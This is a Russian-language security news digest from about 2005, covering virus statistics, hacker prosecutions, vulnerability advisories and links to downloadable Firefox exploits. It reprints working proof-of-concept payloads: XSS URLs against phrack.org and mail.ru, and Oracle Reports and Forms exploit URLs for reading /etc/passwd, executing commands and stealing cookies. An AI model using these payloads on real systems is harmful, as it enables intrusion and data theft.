Безопасность & Хакерство

Microsoft выплатит 250 тысяч, обещанные за поимку авторов Sasser и NetSky

Компания Microsoft объявила о том, что выплатит обещанную награду в 250 тысяч долларов, которую она назначила в прошлом году за информацию об авторах вирусов Sasser и NetSky, распространение которых вызвало глобальную эпидемию и экономический ущерб на миллионы долларов.

Как известно, автором обоих вирусов оказался несовершеннолетний немец Свен Яшан (Sven Jaschan). На прошлой неделе над ним состоялся суд, который приговорил его к условному тюремному сроку в 1 год и 9 месяцев. Суд принял во внимание то, что Яшану в момент совершения преступления было 17 лет (сейчас ему 19).

Microsoft назначила награду за "сдачу" вирусописателя из-за того, что вирусы "эксплуатировали" распространенную программную уязвимость в операционной системе Windows производства этой компании. Как стало известно после объявления приговора, именно благодаря этой награде в полицию обратились два человека, данные о личностях которых не раскрываются, и рассказали то, что им было известно о Яшане (как он впоследствии признался, он очень гордился тем, что сделал и активно хвастался школьным приятелям). Теперь Microsoft обязалась выплатить им обещанные 250 тысяч на двоих.

Источник:lenta.ru

 

It-менеджеры не представляют уровня хакерской угрозы

60 процентов IT-менеджеров не располагают средствами для точной оценки уровня угрозы, который хакеры представляют для их систем. Это обстоятельство выяснилось во время опроса «Тенденции в управлении рисками и уязвимостями», проведенного компанией nCircle, сообщает сайт vnunet.com.

60 процентов 1700 опрошенных менеджеров признались, что не умеют создавать отчеты об уязвимостях своих сетей по регионам или бизнес-подразделениям. Половина опрошенных призналась, что не может выполнять требования политики внутренней безопасности компании.

50 процентов респондентов отметили, что их компаниям требуется более месяца, чтобы собрать информацию для подготовки отчета о соответствии требованиям безопасности.

«Мы провели это исследование, чтобы лучше понять, как представители бизнеса видят риски сетевой безопасности, и как они ими управляют. Результаты исследования выявляют потребность в значительном количестве компаний, которые смогут внедрить решения и процессы для эффективного измерения рисков, управления этими рисками и, в конечном счете, их снижения», — заявила представительница nCircle.

Источник:viruslist.com

 

Ошибки в Kerberos делают приложения уязвимыми

После обнаружения двух слабых звеньев в бесплатной технологии аутентификации сигналы об опасности поступают, кажется, отовсюду, кроме Редмонда.

Серьезные пробелы в защите популярной технологии сетевой аутентификации ставят под угрозу множество программных продуктов. Они позволяют злоумышленникам вывести из строя приложения или проникнуть в компьютеры, использующие спецификацию Kerberos, разработанную в Массачусетсском технологическом институте.

В двух предупреждениях, распространенных во вторник, MIT оценивает обе уязвимости как «критические». Университет предложил поправки для устранения проблем и утверждает, что злоумышленникам «должно быть трудно» воспользоваться этими ошибками.

Несколько производителей ПО уже выпустили обновления к своим продуктам. Так, Red Hat, Turbolinux и Gentoo предложили патчи для собственных версий Linux. Sun во вторник разослала два предупреждения, в которых признает, что несколько версий Solaris уязвимы, но патчей пока не предложила.

В силу широкой популярности Kerberos, в ближайшее время, вероятно, и другие производители выпустят секьюрити-бюллетени, полагает Брайан Грейк, главный технолог компании Preventsys, специализирующейся на анализе уязвимостей: «Думаю, что мы увидим целый поток патчей».

Microsoft тоже использует Kerberos, но собственную версию, на которую эти ошибки не влияют.

По данным MIT, оба бага относятся к Kerberos 5 Release 1.4.1, а также более ранним версиям ПО.

Независимая компания по секьюрити-мониторингу Secunia оценивает проблемы как «высококритичные» — это второй наиболее серьезный уровень опасности по ее шкале. FrSIRT оценивает баги как «критичные» по самому высокому уровню.

Грейк согласен, что уязвимости серьезны, но отмечает, что использовать их для атак нелегко. «Требуется очень много знаний, чтобы превратить эти уязвимости в эксплойты», — сказал он.

Это не первый пробел в защите Kerberos. В августе прошлого года тоже был обнаружен и исправлен «критический» баг.

В начале этого месяца уязвимость другого широко используемого программного компонента поставила под угрозу некоторые из тех же продуктов. Этот баг относится к zlib, технологии компрессии данных open source. Воспользовавшись специально составленным файлом, атакующий мог получить контроль над компьютером или вывести из строя приложения, использующие zlib.

Источник:ZDNet.ru

 

Во "фраке" xss!!!

В http://www.phrack.org найденна xss!!!!
вот - http://www.phrack.org/show.php?p=5<script>alert();</script>&a=1

Уязвимость найденна вчера, но она там и сейчас.

Источник: www.web-hack.ru

 

Mozilla Firefox <= 1.0.4 "IMG" Elements Code Execution Exploit

Mozilla Firefox <= 1.0.4 "IMG" Elements Code Execution Exploit
Цель эксплоита: Mozilla Firefox <= 1.0.4

Воздействие эксплоита: Выполнение произвольного кода

Скачать эксплоит:
www.securitylab.ru/_Exploits/2005/07/mfsa2005-55exploit.html

 

Mozilla Firefox Exploits

2005-07-12 : Mozilla Firefox <= 1.0.4 "data:" URLs Remote Script injection Exploit
Цель эксплоита: Mozilla Firefox <= 1.0.4

Воздействие эксплоита: Выполнение произвольного кода

Скачать эксплоит:
www.securitylab.ru/_Exploits/2005/07/mfsa2005-49exploit.html

Mozilla Firefox <= 1.0.4 "Set As Wallpaper" Code Execution Exploit
Цель эксплоита: Mozilla Firefox <= 1.0.4

Воздействие эксплоита: Выполнение произвольного кода

Скачать эксплоит:
http://www.securitylab.ru/_Exploits/2005/07/mfsa2005-47exploit.html

 

Убытки от хакерских атак сократились
Финансовые потери от атак на корпоративные сети уменьшились более чем наполовину.

По результатам исследования, проведенного американским Институтом компьютерной безопасности и ФБР, ущерб от атак на корпоративные информационные системы в прошлом году оказался на 61 % меньшим, чем в 2003 году. Средний ущерб от атак в 2004 году составлял $204 тыс., в то время как в 2003 году – $526 тыс.

Прошлый год стал уже четвертым подряд, когда среднестатистический ущерб от хакерских вторжений уменьшается. На этом основании исследователи сделали вывод, что корпоративные системы с каждым годом становятся более защищенными.

Несмотря на повышение уровня безопасности корпоративных сетей, стоимость похищенной информации в 2004 году, напротив, возросла. Если в 2003 году она составляла в среднем $51 тыс., то в прошлом году – уже $300 тыс.

Источник:itware.com.ua

 

Российские хакеры грабят американцев

Кража личности приобрела небывалые международные масштабы. Жертвами в большей или меньшей степени оказались уже 10 миллионов американцев. Американский бизнес и отдельные американцы потеряли из-за этого вида преступности в общей сложности 55 миллиардов долларов. Воры специализируются на краже в основном в англоязычных странах, а центры преступности - в России и в странах Восточной Европы. Как сообщает "Уол Стрит Джорнал", главным объектом краж остаются кредитные карты. Специализируются на этом хорошо организованные структуры, созданные по типу легитимного бизнеса. Например, одна из таких организаций, насчитывает до 4 тысяч участников, укравших с августа 2002 года по октябрь 2004 полтора миллиона номеров кредитных карт и снявших более 4 миллионов долларов.

Россия и страны Восточной Европы доминируют в этом виде преступности, поставляя технически грамотных молодых людей. Так одну из таких групп создал хакер с Украины. Интернетная страница этой группы, как и многих других, на русском языке и на английском. В связи с этим, естественно, возникает вопрос - почему в России, в отличие от Индии, ставшей компьютерно развитой страной, молодые компьютерные гении идут в преступный бизнес? Вот что думает об этом сотрудник Института Кейта, директор программ по изучению политики в области информационных систем Джим Харпер.

Джим Харпер: Я недавно участвовал в научной конференции, посвященной сравнению Индии и России. В обоих государствах появился целый слой молодых людей, очень хорошо ориентирующихся в компьютерной техники, электронных средствах информации и связи. Почему же молодежь в каждой из этих двух стран избрала противоположный путь? Отчасти дело в том, что Индия при всем ее восточном своеобразии и прочности общинных традиций, издавна ориентируется на западные ценности. Этому в значительной мере способствовало то, что Индия была британской колонией, а теперь входит в британское Содружество Наций. Для Индии естественна связь с англоязычным миром - Англией, Австралией, США.

У России иной путь. Россия до сих пор не может стать государством, в котором правит закон. Американские и европейские бизнесмены не слишком верят России, чтобы широко строить там свои предприятия, размещать там многомиллиардные заказы, как это делается в Индии. Следовательно, талантливым, технически образованным молодым людям в России труднее найти хорошо оплачиваемую работу. Они, не имеющие строгих моральных традиций, находят себе применение в интернетой он-лайновой преступности.

Ян Рунов: Могут ли США, Россия и Интерпол успешно бороться с таким видом преступности?

Джим Харпер: Конечно, здесь могут сыграть роль правоохранительные органы, в том числе международные. Здесь налицо нарушение многих международных и внутригосударственных законов. Суровый приговор лидерам и длительное тюремное заключение могут хоть в какой-то степени остановить распространение кражи личности по всему миру. Этот вид финансовой преступности грозит подрывом всей кредитной системы мира. Мы воспринимаем такую угрозу очень серьезно. Многие еще не осознают ценности информации - воровать личную, частную информацию это все равно, что воровать деньги, только вор залезает не в карман, а в личный финансовый счет.

Ян Рунов: На российских хакеров ложится задача проникнуть в интернетные файлы или выяснить по электронной почте номера банковских счетов или кредитных карт и узнать личные данные очередной жертвы. А их сообщники в США, Англии или других странах Запада должны использовать эти данные для получения наличных денег, которые затем делятся часто из расчета 40 процентов исполнителям и 60 процентов мозговому центру.

Источник:crime-research.ru

 

Выявленные ошибки вынудили выпустить новую версию Firefox

Браузер open source Firefox и клиент e-mail Thunderbird будут исправлены второй раз за одну неделю, так как оказалось, что внесенные в код изменения мешают правильной работе некоторых расширений.

Обновления доводят Firefox и Thunderbird до версии 1.0.6, а Mozilla Suite будет обновлен до версии 1.7.10, пишут представители Mozilla Foundation в новостном блоге для разработчиков.

Похоже, что проблемы связаны с вышедшим на прошлой неделе обновлением 1.0.5. «Есть очень веские основания полагать, что некоторые усовершенствования в общей системе безопасности, введенные в версию 1.0.5, влияют на ряд расширений, которые с 1.0.4 и более ранними версиями работали, и в версии 1.0.6 мы хотим выявить и решить как можно больше этих проблем», — пишет представитель Mozilla.

Ввиду предполагаемого обновления Mozilla Foundation просит разработчиков временно прекратить работу по локализации ПО для неангло-говорящих рынков — шаг, вызвавший критику со стороны некоторых адептов. «Мы получаем много писем от пользователей Firefox в Польше с вопросом, почему нет Firefox 1.0.5 на польском, — пишет один из разработчиков в новостной группе, посвященной локализации. — Еще несколько дней, и за пределами США вокруг Firefox разразится большой скандал».

Другой разработчик критикует организацию в форуме, где обсуждаются сообщения об ошибках. «Десять миллионов пользователей все еще работают с 1.0.4, хотя после выхода версии 1.0.5 en-US (на американском английском) была обнародована информация о критических секьюрити-багах», — пишет разработчик.

Призывая Mozilla Foundation выпускать все свое ПО на всех языках одновременно, разработчики говорят, что задерживая версии на иностранных языках, организация обесценивает работу, проведенную программистами, продвигающими ее продукты на местные рынки.

Доступны тестовые версии обновленного ПО, и Mozilla просит сторонних разработчиков проверить, работают ли с ними их расширения. «Наиболее чувствительными к внесенным изменениям могут быть расширения, взаимодействующие с веб-контентом и событиями, — пишут представители организации. — Нужно также тщательно протестировать расширения для работы с электронной почтой, такие как Enigmail for Thunderbird (средство защиты e-mail) и Mozilla Suite».

Источник:ZDNet.ru

 

Отказ в обслуживании в PowerDNS

Программа: PowerDNS версии до 2.9.18

Опасность: Средняя

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании.

Уязвимость существует при обработке определенных запросов в реализации LDAP. Злоумышленник может с помощью специально сформированного запроса заставить приложение перестать отвечать на запросы.

Удаленный пользователь, отправляющий запрос с IP адреса, которому запрещен доступ к рекурсии, может получить ответы от других клиентов, доступ к сервису рекурсии которым разрешен.

URL производителя: www.powerdns.com

Решение: Установите исправление с сайта производителя.

 

Множественные уязвимости в продуктах Oracle

Обнаруженные уязвимости позволяют удаленному пользователю прочитать и перезаписать файлы, выполнить произвольные команды на целевой системе и произвести XSS нападение.

1. Уязвимость при обработке параметра DESFORMAT в Oracle Reports позволяет удаленному пользователю просмотреть произвольные файлы на системе, используя абсолютный путь к файлу. Пример:

http://myserver:7778/reports/rwservlet?server=
myserver+report=test.rdf+userid=scott/tiger@
iasdb+destype=file+MODE=CHARACTER+desformat=/etc/passwd

2. Уязвимость в Oracle Reports при обработке исполняемых файлов отчетов (*.rep, *.rdf) позволяет злоумышленнику, с правами загрузки файлов на сервер приложений, выполнить произвольные команды на системе, прочитать и перезаписать произвольные файлы с привилегиями процесса. Злоумышленник может указать абсолютный путь к файлу и выполнить отчет в любой директории на сервере.

Сценарий атаки:

1. Злоумышленник создает или модифицирует обычный отчет путем добавления вызова ORA_FFI для запуска команд или вызова TEXT_IO для создания и чтения файлов сервере прилжений.
2. Злоумышленник генерирует исполняемый файл отчета (например hacker.rdf или hacker.rep) для целевой системы.
3. Копирует исполняемый файл отчета на сервер приложений с помощью подручных средств (SMB, FTP Webdav, NFS…).
4. Выполняет отчет следующим образом:
http://myserver.com:7779/reports/rwservlet? server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF

3. Уязвимость существует при обработке параметра DESNAME в Oracle Reports. Удаленный пользователь может с помощью специально сформированного URL перезаписать произвольный файл на системе с привилегиями процесса.

4. Уязвимость при выполнении форм в Oracle Forms Services позволяет злоумышленнику выполнить произвольные команды на системе.

Сценарий атаки:

1. Злоумышленник создает обычную форму и добавляет к ней следующие строки:


"WHEN_NEW_FORM_INSTANCE"-Trigger
Host('ls > forms_is_unsecure.txt' , NO_SCREEN);
2. Злоумышленник генерирует исполняемый код формы (например, hacker.fmx) для целевой платформе.
3. Копирует бинарник формы на сервер приложений.
4. Запускает отчет следующим образом:
http://myserver.com:7779/forms90/f90servlet?form=/public/johndoe/hacker.fmx
или
http://myserver.com:7779/forms90/f90servlet?module=/tmp/hacker.fmx

5. Уязвимость в Oracle Reports при обработке параметра customize позволяет злоумышленнику просмотреть произвольный файл на целевой системе, указав абсолютный путь к нему. Пример:

http://myserver:7778/reports/rwservlet?server=
myserver+report=test.rdf+userid=scott/tiger@
iasdb+destype=cache+desformat=xml+CUSTOMIZE=
/opt/ORACLE/ias/oracle/product/9.0.2/webcache/webcache.xml

6. Межсайтовый скриптинг возможен в Oracle Reports 9.0.2 при обработке входных данных в параметре customize. Злоумышленник может выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:


http://myserver:7778/reports/rwservlet/showenv?
server=reptest&debug=<script>alert(document.cookie);</script>
http://myserver:7778/reports/rwservlet/parsequery?
server=myserver&test=<script>alert(document.cookie);</script>

http://myserver:7778/reports/rwservlet?server=
myserver+report=test.rdf+userid=scott/tiger@
iasdb+destype=localFile+desformat=delimited
+desname=FILE:+CELLWRAPPER=*+
delimiter=<script>alert(document.cookie);</script>

http://myserver:7778/reports/rwservlet?server=
myserver+report=test.rdf+userid=scott/tiger@
iasdb+destype=localFile+desformat=delimited
+desname=FILE:+CELLWRAPPER=<script>
alert(document.cookie);</script>

URL производителя: oracle.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Источник: http://www.red-database-security.com

 

"Правильным" хакерам будут официально платить

Компания Tipping Point - подразделение 3Com, специализирующееся на компьютерной безопасности, - разработала систему вознаграждений, в рамках которой компьютерные специалисты (в том числе хакеры) смогут получать деньги за поиск уязвимостей в программах различных производителей.

Система получила название Zero Day Initiative, она будет официально представлена на конференции Black Hat в Лас-Вегасе, которая пройдет 27 и 28 июля. Предполагается, что в системе будут регистрироваться компании, желающие проверить свои продукты, и квалифицированные специалисты, которые будут заниматься непосредственно тестированием. Производители будут отчислять средства, которые будут распределяться между тестерами.

© klerk.ru

 

Вирусная десятка за июль от Panda Software

По данным компании Panda Software, в июле наибольший ущерб компьютерам пользователей был нанесен скриптом FTP-функций SDBot. Эти данные были получены на базе статистики использования онлайнового антивирусного сервиса Panda ActiveScan.

В целом, список наиболее распространенных вирусов не особенно изменился. Единственное исключение - смена лидера. Впервые за три месяца вредоносный код Mhtredir.gen сдал свои позиции. Занимающий теперь первую строчку рейтинга скрипт позволяет некоторым версиям SDBot скачивать червя по FTP, если им удается использовать системные уязвимости, такие как LSASS или RPC-DCOM.

Четвертое место занимает семейство Gaobot - это черви с функциями бота, переполняющие интернет несколькими сотнями версий. Для создателей такой вредоносной программы польза очевидна: они могут создавать сети ботов для выполнения ряда действий, включая рассылку спама или проведение координированных атак.

В рейтинге присутствует вирус Smitfraud, нацеленный исключительно на получение финансовой выгоды: он является частью одноименной рекламной программы, которая, среди прочего, мошенническим способом пытается заставить пользователей купить якобы антишпионскую программу.

Вместе с версией BS Mhtredir занимает два места в хит-параде июля. Этот тип вредоносного ПО эксплуатирует незакрытые бреши безопасности компьютеров. Netsky.P, также вошедший в десятку, использует уязвимость, позволяющую запускать почтовые вложения просто при открытии в панели предпросмотра.

Полностью июльская десятка Panda Software выглядит следующим образом:

W32/Sdbot.ftp - 2,47%
Exploit/Mhtredir.gen - 2,08%
W32/Netsky.P.worm - 1,94%
W32/Gaobot.gen.worm - 1,56%
Trj/Qhost.gen - 1,43%
VBS/Psyme.C - 1,04%
Exploit/Mhtredir.BS - 0,95%
W32/Smitfraud.B - 0,81%
Trj/Downloader.DEW - 0,75%
W32/Parite.B - 0,75%

В дополнение к рейтингу вирусов компания составила отдельный рейтинг заражений шпионским ПО. Как и раньше, наиболее часто обнаруживаемой шпионской программой остается ISTbar. Ее основной особенностью является то, что она служит точкой входа для других подобных вредоносных программ, таких как шпионское, рекламное ПО и дозвонщики. Среди "новичков" можно отметить YourSiteBar, шпионскую программу, которая собирает пользовательскую информацию и отправляет ее рекламным интернет-компаниям. Рейтинг выглядит так:

Spyware/ISTbar - 3,32%
Spyware/Cydoor - 3,01%
Spyware/XXXToolbar- 2,79%
Spyware/New.net - 2,54%
Spyware/BetterInet - 1,13%
Spyware/Dyfuca - 0,91%
Spyware/YourSiteBar - 0,75%
Spyware/Petro-Line - 0,67%
Spyware/Altnet- 0,57%
Spyware/BargainBuddy - 0,51%


Источник: "Домашний пк"

 

Вирусная двадцатка Касперского за июль

Email-Worm.Win32.NetSky.q 14,67%
Net-Worm.Win32.Mytob.c 13,58%
Email-Worm.Win32.Zafi.b 8,01%
Email-Worm.Win32.Zafi.d 6,54%
Net-Worm.Win32.Mytob.be 6,12%
Net-Worm.Win32.Mytob.bk 6,07%
Email-Worm.Win32.NetSky.aa 4,41%
Net-Worm.Win32.Mytob.bt 2,65%
Email-Worm.Win32.NetSky.b 2,52%
Net-Worm.Win32.Mytob.bi 2,11%
Net-Worm.Win32.Mytob.au 1,85%
Email-Worm.Win32.NetSky.d 1,73%
Net-Worm.Win32.Mytob.u 1,62%
Net-Worm.Win32.Mytob.ar 1,59%
Email-Worm.Win32.LovGate.w 1,59%
Net-Worm.Win32.Mytob.q 1,37%
Net-Worm.Win32.Mytob.t 1,30%
Email-Worm.Win32.Mydoom.l 1,20%
Email-Worm.Win32.Mydoom.m 1,17%
Email-Worm.Win32.Bagle.ah 1,04%

Источник: компулента.ру

 

XSS в сервисе mail.ru

http://love.mail.ru/my/login.phtml?oid=0&photo_oid=0&login_action=login&tcurl=&login=asd">[script]alert();[/script]

Источник: http://antiox.net.ru/

 

Хакер получил информацию о 61 тыс. студентов

Представители калифорнийского Университета Сонома обнародовали информацию о том, что некому хакеру удалось получить доступ к компьютерной базе данных университета. Таким образом, злоумышленнику удалось похитить конфиденциальную информацию о 61 тыс. студентов университета.

В ходе работ было установлено, что хакер получил доступ к семи компьютерам, которые и содержали важные файлы. При этом злоумышленник использовал "невыявленные ранее уязвимости в операционной системе ". Взлом сети произошел в июле текущего года. Более подробная информация о том, какого рода информация попала в руки к хакеру, пока не разглашается, однако абсолютно точно известно, что в распоряжении злоумышленника оказались файлы с информацией о студентах за период с 1995 по 2002 год с их именами и номерами социального страхования.

По информации университета все пострадавшие будут в обязательном порядке проинформированы о произошедшем.



CNews

 

Уязвимость в Invision Power Board

По сообщению Secunia, некий VRuS обнаружил уязвимость в форумах Invision Power Board 1.0.3/2.0.4 (и возможно других версиях). Уязвимость заключается в возможности присоединять HTML и TXT файлы к соообщениям форума, которые содержат скрипты JavaScript. При открытии таких файлов в браузере, на компьютере пользователя происходит отображение страницы и соответственно выполнение скриптов JavaScript. Для решения этой проблемы, рекомендуется запретить прикрепление HTML и TXT файлов к сообщению форума.



http://secunia.com

 

Саранский хакер

В Мордовии задержан хакер, взломавший один из сайтов Сбербанка России. Как сообщил сегодня ИТАР-ТАСС, начальник отдела по борьбе с преступлениями в сфере высоких технологий Алексей Ширманов, работу сайта нарушил 17-летний школьник, 11-классник одной из пригородных школ Саранска.
Он умудрился "заразить" не только сайт Сбербанка России, но, через него, и десятки других пользователей интернета во многих регионах России. Один из них обратился за помощью в ГУВД Москвы, а уж затем московская милиция обратилась за помощью к коллегам из Мордовии.

По словам Ширманова, количество преступлений в сфере высоких технологий растет очень высокими темпами. Так, если в 2004 году их было зарегистрировано 98, то только в первом полугодии 2005 года - более полутора сотен.

"Деятельность хакеров часто удивляет своей вредной бессмысленностью,- сказал Ширманов,- уж лучше бы деньги с помощью интернета зарабатывали". Между тем, по его словам, неизбежная судимость, даже условная, в дальнейшем может стать серьезным препятствием в судьбе молодого человека.

Источник: хз

 

Суд над не соверщенно летним хакером

В США подросток приговорён к тюремному заключению сроком на 5 лет за организацию DoS-атак на компьютеры двух фирм, занимающихся продажей спортивной одежды в интернете.
Семнадцатилетний хакер Джэсмин Синх (Jasmine Singh) использовал компьютерный вирус, чтобы создать сеть из нескольких тысяч так называемых компьютеров-зомби и нанести удар по намеченным жертвам. Пострадавшие фирмы - Jersey-Joe.com и Distant Replays оценивают общий ущерб примерно в $1,5 млн.
Юного злоумышленника удалось найти по следу, который оставлял его вирус на захваченных компьютерах. Вирус высылал информацию пользователю, пользующемуся псевдонимом "Pherk". Удалось обнаружить и почтовый адрес с подобным именем, зарегистрированный на имя школьника из Нью-Джерси Джэсмина Синха.
Подросток признал свою вину и заявил, что его друг, занимающийся продажей спортивных товаров в интернете, попросил его нанести удар по конкурентам в обмен на три пары кроссовок и часы. Заказчик преступления восемнадцатилетний Джейсон Арабо также был вскоре задержан.
Первоначально Синху были предъявлены два обвинения первой степени, грозящие сроком заключения до 20 лет каждое. Затем они были заменены обвинениями второй степени, в результате чего и был вынесен относительно несуровый приговор. Также хакеру предстоит выплатить пострадавшим фирмам компенсацию в $35 тыс.

Источник:CNews.ru

 

Русскоговорящее хак сообщество объявляет войну террористам

19 октября, 2005

В Интернете появился сайт, который призывает всех хакеров принять участие в “уничтожении ресурсов, ведущих террористическую пропаганду”. В настоящий момент усилиями неизвестных хакеров уже закрыты форум портала Кавказ-центр и блокирован счет сбора средств в платежной системе США.

На сайте peace4peace.com неизвестная группа единомышленников организовала собственный фронт борьбы с печально известным сайтом "Кавказ-центра". Как написано на сайте “Наша задача уничтожать ресурсы, ведущие террористическую пропаганду и преднамеренно искажающие факты. Законы военного времени развязывают нам руки, и мы будем использовать все доступные нам методы и средства! Наша цель - показать то, что мы едины в борьбе против террористов. Мы всего лишь участники хак-сообщества самый разных специальностей, большинство из нас уже давно находится по ту сторону закона, но это не мешает нам быть патриотами, ратующими за мир во всем мире”. По словам авторов сайта “На сегодняшний день начата крупномасштабная операция, мы вложили личного материала и оборудования стоимостью в десятки тысяч долларов, чтобы противостоять терроризму в интернете, выработали общую политику борьбы и избрали единое руководство”.

В настоящий момент уже закрыты форум портала Кавказ-центр и блокирован счет сбора средств в платежной системе США. Авторы сайта обещают длительную войну, пока не будут “уничтожены ресурсы, ведущие террористическую пропаганду и преднамеренно искажающие факты”.